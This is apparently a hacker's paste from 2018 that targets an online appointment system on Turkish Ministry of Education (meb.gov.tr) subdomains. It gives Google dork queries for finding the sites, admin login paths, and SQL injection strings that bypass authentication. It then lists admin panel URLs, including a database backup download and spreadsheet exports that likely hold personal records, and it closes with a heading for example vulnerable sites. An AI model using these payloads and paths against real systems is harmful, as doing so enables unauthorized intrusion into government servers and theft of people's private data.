Untitled

a guest
Oct 17th, 2018
MAHAKAL S3NA -------------------------------MAHAKAL S3NA

# Google Dork :
intext:''Webmaster Atom Bilgisayar Yazılım Danışmanllık'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=rapor'' site:meb.gov.tr
inurl:''/randevu/index.php?sayfa=iletisim'' site:meb.gov.tr

# Admin Panel Login Path :

/randevu/admin/
/onlinerandevu/admin/

# Authentication Bypass Exploit :

Admin Username :

anything' OR 'x'='x

Admin Password :

anything' OR 'x'='x

You can also try these:

1' or 1=1 -- -
1' or 1=1 -- -

'=''or'
'=''or'

# Useable Admin Control Panel URL Links Exploits =>

/randevu/admin/index.php
/randevu/admin/index3.php
/randevu/admin/yedekal.php => SQL Database Backup Arbitrary File Download
/admin/randevu.xls
/onlinerandevu/admin/hasta.xls
/randevu/admin/sifre.php
/randevu/admin/resetle.php
/randevu/admin/index4.php
/randevu/admin/ogretmen.php
/randevu/admin/karar.php
/randevu/admin/egitsel.php
/randevu/admin/test.php
/randevu/admin/sebeb.php
/randevu/admin/tani.php
/randevu/admin/destek.php
/randevu/admin/oneri.php
/randevu/admin/index1.php
/randevu/admin/dr.php
/randevu/admin/saat.php
/randevu/admin/basvuru.php
/randevu/admin/sart.php
/randevu/admin/hastalik.php
/randevu/admin/site.php
/randevu/admin/ilce.php
/randevu/admin/okul.php
/randevu/admin/kademe.php
/randevu/admin/tatil.php
/randevu/admin/index5.php
/randevu/admin/randevu.php
/randevu/admin/liste.php
/randevu/admin/page1.php
/randevu/admin/rapor.php
/admin/admin.php?islem=randevu&randevu=listele
/admin/admin.php?islem=ogretmen
/admin/admin.php?islem=kullanici
/randevu/admin/admin.php?islem=tarih
/randevu/admin/admin.php?islem=saat
/randevu/admin/admin.php?islem=okul
/randevu/admin/admin.php?islem=randevu&randevu=dokum_ver
/randevu/admin/admin.php?islem=randevu&randevu=arsiv
/randevu/admin/admin.php?islem=randevu&randevu=reddedilen
/randevu/admin/admin.php?islem=randevu&randevu=rezerve

# Directory Paths =>

/randevu/index.php?sayfa=iletisim
/randevu/index.php?sayfa=iptal
/randevu/index.php?sayfa=sorgu
/randevu/index.php?sayfa=rapor
/randevu/index.php?sayfa=%F6gretmen%20giri%FEi

##########################################################################################################

Example Vulnerable Sites *.subdomains of meb.gov.tr =>